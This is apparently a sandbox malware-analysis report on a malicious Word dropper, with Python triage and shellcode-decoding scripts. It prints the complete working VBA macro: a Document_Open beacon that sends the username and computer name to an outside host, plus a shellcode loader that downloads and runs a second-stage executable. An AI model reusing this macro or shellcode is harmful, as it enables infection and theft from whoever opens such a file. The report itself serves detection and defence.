Verdict: MALICIOUS (risk score 158)

Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
T1140 Deobfuscate/Decode Files or Information
The sample carries VBA macros with a Document_Open auto-exec handler, so the whole chain runs as soon as the user clicks through the enable-content prompt. The document body is a parcel-delivery lure ("central post master"); the CommandButton1_Click handler only shows a "form received" message and closes the document (its doit call is commented out), so the button is a decoy and Document_Open is the real entry point. Document_Open deletes the document's first shape (typically the enable-content lure graphic), reads the Author document property as a per-sample uid (extractit), and sends it together with Environ("USERNAME") and Environ("COMPUTERNAME") in a synchronous GET to https://launchpad.fintechexchange.net/index.php through MSXML2.ServerXMLHTTP. That request is a victim-fingerprint beacon, not a download: the response is never read. The macro then sets the working directory to %AppData% and calls doit(), which copies a hard-coded 399-byte 32-bit x86 shellcode array byte by byte, with RtlMoveMemory, into memory obtained from VirtualAlloc(0, n, &H1000 = MEM_COMMIT, &H40 = PAGE_EXECUTE_READWRITE) and starts it with CreateThread. The three kernel32 imports are declared under unrelated Alias names (alActiveDocument, rtmCloseDocument, ctt), so the API names never appear at the call sites. The shellcode locates kernel32 through the PEB loader list, resolves LoadLibraryA and GetProcAddress by ROR-13 export-name hash (0xEC0E4E8E and 0x7C0DFCAA), and stores its strings with every byte one below its real value, adding one back at run time before NUL-terminating them; decoded, they are urlmon.dll, URLDownloadToFileA, flash.exe, WinExec, ExitThread and https://launchpad.fintechexchange.net/flash_sl.exe. The second stage is therefore fetched by the shellcode with URLDownloadToFileA to flash.exe (relative to the current directory, i.e. %AppData%) and launched with WinExec, which is what the VirtualAlloc/CreateThread pattern indicated. If Shapes(1).Delete raises an error, the inprotected handler saves the document as %AppData%\PostRedirect.doc in Word 97-2003 format, reopens that copy and retries the deletion there. Two practical caveats: the Declare statements have no PtrSafe and the shellcode reads fs:[0x30], so the payload only runs under 32-bit Office (in 64-bit Office the module fails to compile); and the beacon fires before the download, so an outbound GET carrying uid/un/cn parameters is the earliest network indicator.
Heuristics (8)

- VBA macros detected (medium; OLE_VBA_MACROS; 4 related findings): the document contains VBA macro code.
- CreateObject call (high; OLE_VBA_CREATEOBJ). Matched line in script: `Set h = CreateObject("MSXML2.ServerXMLHTTP")`
- VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC): the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents and documents where source extraction fails, so that visible source is unavailable.
- Document_Open macro (low; OLE_VBA_DOCOPEN). Matched line in script: `Private Sub Document_Open()`
- Environ() call, environment variable access (low; OLE_VBA_ENVIRON). Matched line in script: `h.Open "GET", "https://launchpad.fintechexchange.net/index.php?uid=" & uid & "&un=" & Environ("USERNAME") & "&cn=" & Environ("COMPUTERNAME"), False`
- Reference to VirtualAlloc API (medium; SC_STR_VIRTUALALLOC). The string occurs only in the Alias clause of a kernel32 Declare; the call sites use the local name alActiveDocument, and RtlMoveMemory and CreateThread are imported the same way as rtmCloseDocument and ctt.
- Macro/content-enable lure (medium; SE_ENABLE_LURE): the document instructs the user to enable macros or editing, a common technique used by malware droppers to get past Office macro security settings.
- Embedded URL (info; EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - https://launchpad.fintechexchange.net/index.php?uid= (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
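The heuristics above match on surface strings, which works here because the real API names survive in the Alias clauses. The Python below is an added worked example (not the analyzer's rule engine and not code from the sample): it runs the same checks over an excerpt of the extracted macros.bas and adds the one that the string rules reach only by accident, resolving each Declare to the export it really imports regardless of its local name and flagging the allocate/copy/execute chain and the PAGE_EXECUTE_READWRITE allocation. Rule identifiers, severities and the API lists are ours.

```python
"""Alias-aware triage of VBA source extracted with olevba.

Added example for this report; it is not the analyzer's rule engine and not
code from the sample. SAMPLE is a constructed excerpt of the extracted
macros.bas (the shellcode array is left out).
"""
import re

SAMPLE = '''Private Declare Function ctt Lib "kernel32" Alias "CreateThread" (ByVal Tkkjijxfc As Long, ByVal Fnee As Long, ByVal Rpejhpk As Long, Ssw As Long, ByVal Nxlm As Long, Epcsadilr As Long) As Long
Private Declare Function alActiveDocument Lib "kernel32" Alias "VirtualAlloc" (ByVal Dcozrgid As Long, ByVal Alu As Long, ByVal Euntyu As Long, ByVal Ebknpxo As Long) As Long
Private Declare Function rtmCloseDocument Lib "kernel32" Alias "RtlMoveMemory" (ByVal Lignezo As Long, ByRef Kvaopnm As Any, ByVal Bpqxrri As Long) As Long
Sub doit()
    Fvidm = alActiveDocument(0, UBound(Ajbfqmiu), &H1000, &H40)
    Yzpfobi = rtmCloseDocument(Fvidm + Yfs, Jkdduwwo, 1)
    Yzpfobi = ctt(0, 0, Fvidm, 0, 0, 0)
End Sub
Private Sub Document_Open()
    Set h = CreateObject("MSXML2.ServerXMLHTTP")
    h.Open "GET", "https://launchpad.fintechexchange.net/index.php?uid=" & uid & "&un=" & Environ("USERNAME") & "&cn=" & Environ("COMPUTERNAME"), False
    ChDir Environ("AppData")
    doit
End Sub
'''

# Our own (non-exhaustive) lists; extend them for your environment.
AUTOEXEC = {"document_open", "autoopen", "auto_open", "autoexec",
            "workbook_open", "document_close", "autoclose", "auto_close"}
MEMORY_APIS = {"VirtualAlloc", "VirtualAllocEx", "VirtualProtect", "NtAllocateVirtualMemory"}
COPY_APIS = {"RtlMoveMemory", "RtlCopyMemory", "WriteProcessMemory"}
EXEC_APIS = {"CreateThread", "CreateRemoteThread", "QueueUserAPC", "NtCreateThreadEx"}
RISKY_PROGIDS = {"msxml2.serverxmlhttp", "msxml2.xmlhttp", "microsoft.xmlhttp",
                 "wscript.shell", "shell.application", "adodb.stream",
                 "scripting.filesystemobject"}
PAGE_EXECUTE_READWRITE = 0x40

DECLARE_RE = re.compile(
    r'Declare\s+(PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"'
    r'(?:\s+Alias\s+"([^"]+)")?', re.I)
SUB_RE = re.compile(r'^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)\s*\(', re.I | re.M)
CREATEOBJECT_RE = re.compile(r'CreateObject\(\s*"([^"]+)"', re.I)
ENVIRON_RE = re.compile(r'Environ\(\s*"([^"]+)"', re.I)
URL_RE = re.compile(r'https?://[^\s"<>]+', re.I)


def declared_imports(src):
    """{local name: (library, real export name, has PtrSafe)} for every Declare.
    Without an Alias clause the local name is the export name."""
    return {m.group(2): (m.group(3).lower(), m.group(4) or m.group(2), bool(m.group(1)))
            for m in DECLARE_RE.finditer(src)}


def triage(src):
    """Return a list of (rule, severity, detail) findings for one VBA module."""
    findings = []
    imports = declared_imports(src)
    real_names = set()
    for local, (lib, api, ptrsafe) in imports.items():
        real_names.add(api)
        if api in MEMORY_APIS | COPY_APIS | EXEC_APIS:
            note = "" if api == local else " (declared as %s, so call sites never name it)" % local
            findings.append(("VBA_DECLARE_SHELLCODE_API", "high", "%s!%s%s" % (lib, api, note)))
        if not ptrsafe:
            findings.append(("VBA_DECLARE_NO_PTRSAFE", "info",
                             "%s: no PtrSafe, compiles only in 32-bit Office" % local))
    if real_names & MEMORY_APIS and real_names & COPY_APIS and real_names & EXEC_APIS:
        findings.append(("VBA_SHELLCODE_LOADER_CHAIN", "high",
                         "allocate + copy + execute imports present: " + ", ".join(sorted(real_names))))
    # RWX allocation: the last argument of a VirtualAlloc (or alias) call is &H40.
    for local, (_, api, _) in imports.items():
        if api in ("VirtualAlloc", "VirtualAllocEx"):
            for m in re.finditer(r'\b%s\s*\((.*)\)' % re.escape(local), src):
                last = m.group(1).rsplit(",", 1)[-1].strip()
                if last.upper() == "&H%X" % PAGE_EXECUTE_READWRITE:
                    findings.append(("VBA_RWX_ALLOC", "high", m.group(0).strip()))
    for m in SUB_RE.finditer(src):
        if m.group(1).lower() in AUTOEXEC:
            findings.append(("OLE_VBA_AUTOEXEC", "low", m.group(1)))
    for m in CREATEOBJECT_RE.finditer(src):
        progid = m.group(1)
        findings.append(("OLE_VBA_CREATEOBJ",
                         "high" if progid.lower() in RISKY_PROGIDS else "medium", progid))
    env = sorted({m.group(1) for m in ENVIRON_RE.finditer(src)})
    if env:
        findings.append(("OLE_VBA_ENVIRON", "low", ", ".join(env)))
    for url in sorted({m.group(0) for m in URL_RE.finditer(src)}):
        findings.append(("EMBEDDED_URL", "info", url))
    return findings


if __name__ == "__main__":
    for rule, sev, detail in triage(SAMPLE):
        print("%-26s %-6s %s" % (rule, sev, detail))
```

On this excerpt the alias resolution turns three harmless-looking names into kernel32!VirtualAlloc, kernel32!RtlMoveMemory and kernel32!CreateThread, which is the in-process shellcode loader chain; the missing PtrSafe on all three is a reminder that a 64-bit Office sandbox will not detonate this sample.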
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5511 bytes | 109b5462e0689a5fdfb5a3639d59e0b89a7392b28bee5fb5074cc86f68120854 |
Preview (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function ctt Lib "kernel32" Alias "CreateThread" (ByVal Tkkjijxfc As Long, ByVal Fnee As Long, ByVal Rpejhpk As Long, Ssw As Long, ByVal Nxlm As Long, Epcsadilr As Long) As Long
Private Declare Function alActiveDocument Lib "kernel32" Alias "VirtualAlloc" (ByVal Dcozrgid As Long, ByVal Alu As Long, ByVal Euntyu As Long, ByVal Ebknpxo As Long) As Long
Private Declare Function rtmCloseDocument Lib "kernel32" Alias "RtlMoveMemory" (ByVal Lignezo As Long, ByRef Kvaopnm As Any, ByVal Bpqxrri As Long) As Long
Function extractit() As String
Dim o As Object
For i = 1 To ThisDocument.BuiltInDocumentProperties.Count
Set o = ThisDocument.BuiltInDocumentProperties(i)
If o.Name = "Author" Then
extractit = CStr(o.Value)
End If
Next i
End Function
Sub doit()
Dim Jkdduwwo As Long, Ajbfqmiu As Variant, Yfs As Long
Dim Fvidm As Long, Yzpfobi As Long
Ajbfqmiu = Array(&H89, &HE5, &H83, &HEC, &H10, &H64, &H8B, &H1D, &H30, &H0, &H0, &H0, &H8B, &H5B, &HC, &H8B, &H5B, &H14, &H8B, &H1B, &H8B, &H1B, &H8B, &H5B, &H10, &H89, &H5D, &HF4, &H68, &H8E, &H4E, &HE, &HEC, &H53, &HE8, &H7, &H1, &H0, &H0, &H89, &H45, _
&HFC, &H83, &HC4, &H8, &H68, &HAA, &HFC, &HD, &H7C, &H53, &HE8, &HF6, &H0, &H0, &H0, &H89, &H45, &HF8, &H83, &HC4, &H8, &H31, &HD2, &HEB, &H1D, &H59, &H88, &H51, &H6E, &HE8, &H31, &H1, &H0, &H0, &H88, &H51, &HA, &H88, &H51, &H1D, &H88, _
&H51, &H27, &H88, &H51, &H2F, &H88, &H51, &H3A, &H89, &H4D, &HF0, &HEB, &H74, &HE8, &HDE, &HFF, &HFF, &HFF, &H74, &H71, &H6B, &H6C, &H6E, &H6D, &H2D, &H63, &H6B, &H6B, &H4E, &H54, &H51, &H4B, &H43, &H6E, &H76, &H6D, &H6B, &H6E, &H60, &H63, &H53, _
&H6E, &H45, &H68, &H6B, &H64, &H40, &H4E, &H65, &H6B, &H60, &H72, &H67, &H2D, &H64, &H77, &H64, &H4E, &H56, &H68, &H6D, &H44, &H77, &H64, &H62, &H4E, &H44, &H77, &H68, &H73, &H53, &H67, &H71, &H64, &H60, &H63, &H4E, &H4E, &H67, &H73, &H73, &H6F, _
&H72, &H39, &H2E, &H2E, &H6B, &H60, &H74, &H6D, &H62, &H67, &H6F, &H60, &H63, &H2D, &H65, &H68, &H6D, &H73, &H64, &H62, &H67, &H64, &H77, &H62, &H67, &H60, &H6D, &H66, &H64, &H2D, &H6D, &H64, &H73, &H2E, &H65, &H6B, &H60, &H72, &H67, &H5E, &H72, _
&H6B, &H2D, &H64, &H77, &H64, &H4E, &H51, &H8B, &H5D, &HFC, &HFF, &HD3, &H8B, &H5D, &HFC, &H8B, &H4D, &HF0, &H83, &HC1, &HB, &H51, &H50, &H8B, &H5D, &HF8, &HFF, &HD3, &H31, &HD2, &H52, &H52, &H8B, &H4D, &HF0, &H83, &HC1, &H1E, &H51, &H83, &HC1, _
&H1E, &H51, &H52, &HFF, &HD0, &H8B, &H4D, &HF0, &H83, &HC1, &H28, &H51, &H8B, &H45, &HF4, &H50, &H8B, &H45, &HF8, &HFF, &HD0, &H31, &HD2, &H66, &H83, &HCA, &H5, &H52, &H8B, &H4D, &HF0, &H83, &HC1, &H1E, &H51, &HFF, &HD0, &H8B, &H4D, &HF0, &H83, _
&HC1, &H30, &H51, &H8B, &H45, &HF4, &H50, &H8B, &H45, &HF8, &HFF, &HD0, &H52, &HFF, &HD0, &H60, &H8B, &H6C, &H24, &H24, &H8B, &H45, &H3C, &H8B, &H54, &H5, &H78, &H1, &HEA, &H8B, &H4A, &H18, &H8B, &H5A, &H20, &H1, &HEB, &HE3, &H34, &H49, &H8B, _
&H34, &H8B, &H1, &HEE, &H31, &HFF, &H31, &HC0, &HFC, &HAC, &H84, &HC0, &H74, &H7, &HC1, &HCF, &HD, &H1, &HC7, &HEB, &HF4, &H3B, &H7C, &H24, &H28, &H75, &HE1, &H8B, &H5A, &H24, &H1, &HEB, &H66, &H8B, &HC, &H4B, &H8B, &H5A, &H1C, &H1, &HEB, _
&H8B, &H4, &H8B, &H1, &HE8, &H89, &H44, &H24, &H1C, &H61, &HC3, &H89, &HCE, &H31, &HDB, &H8B, &H1E, &H84, &HDB, &H74, &H8, &H83, &HC3, &H1, &H89, &H1E, &H46, &HEB, &HF2, &HC3)
Fvidm = alActiveDocument(0, UBound(Ajbfqmiu), &H1000, &H40)
For Yfs = LBound(Ajbfqmiu) To UBound(Ajbfqmiu)
Jkdduwwo = Ajbfqmiu(Yfs)
Yzpfobi = rtmCloseDocument(Fvidm + Yfs, Jkdduwwo, 1)
Next Yfs
Yzpfobi = ctt(0, 0, Fvidm, 0, 0, 0)
End Sub
Private Sub CheckBox1_Click()
End Sub
Private Sub CommandButton1_Click()
' On Error GoTo Failed
MsgBox "Thank you. Your form has been received by the central post master and will be processed shortly."
'doit
ThisDocument.Close False
GoTo Quit
Failed:
MsgBox "There was a problem submitting your form. Please try again later."
Quit:
End Sub
Private Sub Document_Open()
Dim uid As String
On Error GoTo inprotected
ThisDocument.Shapes(1).Delete
On Error Resume Next
uid = extractit()
Dim h As Object
Set h = CreateObject("MSXML2.ServerXMLHTTP")
h.Open "GET", "https://launchpad.fintechexchange.net/index.php?uid=" & uid & "&un=" & Environ("USERNAME") & "&cn=" & Environ("COMPUTERNAME"), False
h.Send ""
ChDrive "C"
ChDir Environ("AppData")
doit
Exit Sub
inprotected:
ThisDocument.SaveAs2 Environ("AppData") & "\\PostRedirect.doc", wdFormatDocument
'ThisDocument.Close False
DoEvents
Documents.Open Environ("AppData") & "\\PostRedirect.doc", False, False
ActiveWindow.View.ReadingLayout = False
DoEvents
ThisDocument.Shapes(1).Delete
'ThisDocument.Shapes(2).Delete
End Sub
Sub Dosomestuff()
ThisDocument.Shapes(1).Delete
'ThisDocument.Shapes(2).Delete
ThisDocument.AcceptAllRevisionsShown
End Sub
```
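The strings the doit() shellcode carries can be recovered without detonating the sample. The Python below is an added worked example for this report, not analyzer output and not code from the sample: SHELLCODE is the Ajbfqmiu array copied from the extracted macro; the helpers find the backwards call that lands on `pop ecx` (the call/pop trick that hands the string block's address to the code), replay the stub's own setup exactly as the bytes describe it (one NUL write at +0x6E, a call to a routine that adds one to every byte up to the first NUL, then five more NUL writes), and read the C strings at the offsets the main body adds to ecx before each push. The offsets and the decoder's behaviour are taken from the bytes on this page; the function names and the safety checks are ours.

```python
"""Recover the strings carried by the doit() shellcode, statically.

Added worked example for this report; it is not analyzer output and not
code from the sample. SHELLCODE is the Ajbfqmiu array from the extracted
macro. Instead of hard-coding the decoding, the helpers replay the
shellcode's own string-setup stub, so a different stub makes them fail
loudly rather than return nonsense.
"""
import struct

# Ajbfqmiu from doit(): 399 bytes of 32-bit x86 (the macro passes UBound = 398
# to VirtualAlloc and then copies all 399 bytes).
SHELLCODE = bytes.fromhex(
    "89 E5 83 EC 10 64 8B 1D 30 00 00 00 8B 5B 0C 8B 5B 14 8B 1B "
    "8B 1B 8B 5B 10 89 5D F4 68 8E 4E 0E EC 53 E8 07 01 00 00 89 "
    "45 FC 83 C4 08 68 AA FC 0D 7C 53 E8 F6 00 00 00 89 45 F8 83 "
    "C4 08 31 D2 EB 1D 59 88 51 6E E8 31 01 00 00 88 51 0A 88 51 "
    "1D 88 51 27 88 51 2F 88 51 3A 89 4D F0 EB 74 E8 DE FF FF FF "
    "74 71 6B 6C 6E 6D 2D 63 6B 6B 4E 54 51 4B 43 6E 76 6D 6B 6E "
    "60 63 53 6E 45 68 6B 64 40 4E 65 6B 60 72 67 2D 64 77 64 4E "
    "56 68 6D 44 77 64 62 4E 44 77 68 73 53 67 71 64 60 63 4E 4E "
    "67 73 73 6F 72 39 2E 2E 6B 60 74 6D 62 67 6F 60 63 2D 65 68 "
    "6D 73 64 62 67 64 77 62 67 60 6D 66 64 2D 6D 64 73 2E 65 6B "
    "60 72 67 5E 72 6B 2D 64 77 64 4E 51 8B 5D FC FF D3 8B 5D FC "
    "8B 4D F0 83 C1 0B 51 50 8B 5D F8 FF D3 31 D2 52 52 8B 4D F0 "
    "83 C1 1E 51 83 C1 1E 51 52 FF D0 8B 4D F0 83 C1 28 51 8B 45 "
    "F4 50 8B 45 F8 FF D0 31 D2 66 83 CA 05 52 8B 4D F0 83 C1 1E "
    "51 FF D0 8B 4D F0 83 C1 30 51 8B 45 F4 50 8B 45 F8 FF D0 52 "
    "FF D0 60 8B 6C 24 24 8B 45 3C 8B 54 05 78 01 EA 8B 4A 18 8B "
    "5A 20 01 EB E3 34 49 8B 34 8B 01 EE 31 FF 31 C0 FC AC 84 C0 "
    "74 07 C1 CF 0D 01 C7 EB F4 3B 7C 24 28 75 E1 8B 5A 24 01 EB "
    "66 8B 0C 4B 8B 5A 1C 01 EB 8B 04 8B 01 E8 89 44 24 1C 61 C3 "
    "89 CE 31 DB 8B 1E 84 DB 74 08 83 C3 01 89 1E 46 EB F2 C3"
)

# Offsets the main body adds to the block base before each push
# ("8B 4D F0 83 C1 xx": mov ecx,[ebp-0x10]; add ecx,xx; 0x3C is 0x1E added twice).
REFERENCED_OFFSETS = (0x00, 0x0B, 0x1E, 0x28, 0x30, 0x3C)

# Start of the add-one decoder the stub calls:
#   mov esi,ecx / xor ebx,ebx / L: mov ebx,[esi]; test bl,bl; jz out; add ebx,1 ...
DECODER_PROLOGUE = bytes.fromhex("89 CE 31 DB 8B 1E 84 DB 74 08 83 C3 01")


def locate_call_pop(sc: bytes):
    """Return (index of 'pop ecx', index of the encoded block) for the first
    backwards E8 call whose target is 0x59; the block follows that call."""
    for pos, b in enumerate(sc):
        if b != 0xE8 or pos + 5 > len(sc):
            continue
        rel = struct.unpack_from("<i", sc, pos + 1)[0]
        target = pos + 5 + rel
        if rel < 0 and 0 <= target < pos and sc[target] == 0x59:
            return target, pos + 5
    raise ValueError("call/pop string stub not found")


def replay_string_stub(sc: bytes) -> bytearray:
    """Emulate the stub between 'pop ecx' and the short jmp over the block.

    Only the instructions that occur there are modelled:
      88 51 ib   mov [ecx+ib], dl     (edx was zeroed, so this writes a NUL)
      E8 rel32   call decoder         (+1 on every byte up to the first NUL)
      89 4D F0   mov [ebp-0x10], ecx  (bookkeeping, skipped)
    The 'EB ib' just before the call skips the 5-byte call plus the block,
    so the block length is ib - 5.
    """
    pop_at, blob_start = locate_call_pop(sc)
    jmp_at = blob_start - 7                  # EB ib, E8 rel32, then the block
    if sc[jmp_at] != 0xEB:
        raise ValueError("expected a short jmp over the string block")
    blob = bytearray(sc[blob_start:blob_start + sc[jmp_at + 1] - 5])
    ip = pop_at + 1                          # skip 'pop ecx'
    while ip < jmp_at:
        if sc[ip] == 0x88 and sc[ip + 1] == 0x51:
            blob[sc[ip + 2]] = 0
            ip += 3
        elif sc[ip] == 0xE8:
            tgt = ip + 5 + struct.unpack_from("<i", sc, ip + 1)[0]
            if sc[tgt:tgt + len(DECODER_PROLOGUE)] != DECODER_PROLOGUE:
                raise ValueError("unexpected decoder routine at 0x%x" % tgt)
            i = 0
            while blob[i] != 0:              # the dword 'add ebx,1' never carries
                blob[i] = (blob[i] + 1) & 0xFF   # here: no encoded byte is 0xFF
                i += 1
            ip += 5
        elif sc[ip:ip + 3] == b"\x89\x4D\xF0":
            ip += 3
        else:
            raise ValueError("unmodelled instruction 0x%02x at 0x%x" % (sc[ip], ip))
    return blob


def recover_shellcode_strings(sc: bytes = SHELLCODE) -> dict:
    """Map each referenced offset to the NUL-terminated ASCII string there."""
    blob = replay_string_stub(sc)
    return {off: blob[off:blob.index(0, off)].decode("ascii") for off in REFERENCED_OFFSETS}


if __name__ == "__main__":
    for off, s in recover_shellcode_strings().items():
        print("block+0x%02x: %s" % (off, s))
```

The six strings line up with the call sequence in the bytes: LoadLibraryA(block+0x00), GetProcAddress(urlmon, block+0x0B), URLDownloadToFileA(NULL, block+0x3C, block+0x1E, 0, NULL), then GetProcAddress(kernel32, block+0x28) and WinExec(block+0x1E, 5), and finally ExitThread. The download URL shares its host with the beacon the macro sends the username and computer name to, and flash.exe is a relative path, so it lands in the directory Document_Open has just changed to, %AppData%.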